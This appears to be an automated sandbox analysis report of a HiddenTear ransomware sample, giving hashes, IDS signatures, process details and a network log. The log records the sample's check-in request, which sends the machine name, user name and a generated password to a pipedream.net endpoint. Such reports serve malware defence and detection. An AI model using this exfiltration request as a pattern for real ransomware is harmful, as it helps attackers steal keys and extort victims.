Resubmissions

03/08/2021, 07:41 UTC

210803-qwfhgtkjv6 10

26/07/2021, 12:41 UTC

210726-dxe6lafqxn 10

Analysis

  • max time kernel
    19s
  • max time network
    119s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    03/08/2021, 07:41 UTC

General

  • Target

    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe

  • Size

    207KB

  • MD5

    900c456cbcd61ed2bf91378112e93eb0

  • SHA1

    c227ca088a4f80729b83396cafa0152d9778254e

  • SHA256

    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd

  • SHA512

    e9e71efbe7e70ece0d5022c401d6cb8c808237946b6a30fcfe18d8d43ea93460c04977015daf05a7baa5a9f1467c5ffdcf499a52706c27a0055529a3f38f0ba7

Malware Config

Signatures

  • HiddenTear Ransomware

    Open-Source ransomware available on Github since 2015, with many versions in the wild.

  • suricata: ET MALWARE Observed Reimageplus Ransomware Domain in TLS SNI
  • suricata: ET MALWARE Reimageplus Ransomware Checkin
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe"
    • Suspicious use of AdjustPrivilegeToken
    PID:632

Network

  • flag-unknown
    DNS
    enfiniql2buev6o.m.pipedream.net
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    Remote address:
    8.8.8.8:53
    Request
    enfiniql2buev6o.m.pipedream.net
    IN A
    Response
    enfiniql2buev6o.m.pipedream.net
    IN A
    23.20.98.249
    enfiniql2buev6o.m.pipedream.net
    IN A
    54.164.210.73
    enfiniql2buev6o.m.pipedream.net
    IN A
    34.195.72.180
    enfiniql2buev6o.m.pipedream.net
    IN A
    54.237.1.211
    enfiniql2buev6o.m.pipedream.net
    IN A
    44.196.248.120
    enfiniql2buev6o.m.pipedream.net
    IN A
    54.156.232.99
  • flag-unknown
    GET
    https://enfiniql2buev6o.m.pipedream.net/?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    Remote address:
    23.20.98.249:443
    Request
    GET /?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom HTTP/1.1
    Host: enfiniql2buev6o.m.pipedream.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 03 Aug 2021 07:42:15 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 179
    Connection: keep-alive
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    x-pd-status: sent to coordinator
    ETag: W/"b3-17a3f04b518"
  • 23.20.98.249:443
    https://enfiniql2buev6o.m.pipedream.net/?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom
    tls, http
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    901 B
    6.1kB
    9
    8

    HTTP Request

    GET https://enfiniql2buev6o.m.pipedream.net/?computer_name=GFBFPSXA&userName=Admin&password=TaUmQDsB0wdVYSH&allow=ransom

    HTTP Response

    200
  • 8.8.8.8:53
    enfiniql2buev6o.m.pipedream.net
    dns
    fd945e2cc6d1b3a453135d5df04eeccbfd16f76e0744dd27b99e0eccaa9053bd.sample.exe
    77 B
    173 B
    1
    1

    DNS Request

    enfiniql2buev6o.m.pipedream.net

    DNS Response

    23.20.98.249
    54.164.210.73
    34.195.72.180
    54.237.1.211
    44.196.248.120
    54.156.232.99

MITRE ATT&CK Matrix


Downloads

  • memory/632-114-0x0000000000920000-0x0000000000921000-memory.dmp

    Filesize

    4KB

  • memory/632-116-0x00000000056B0000-0x00000000056B1000-memory.dmp

    Filesize

    4KB

  • memory/632-117-0x0000000005250000-0x0000000005251000-memory.dmp

    Filesize

    4KB

  • memory/632-118-0x00000000051B0000-0x00000000056AE000-memory.dmp

    Filesize

    5.0MB

  • memory/632-119-0x0000000005170000-0x0000000005171000-memory.dmp

    Filesize

    4KB
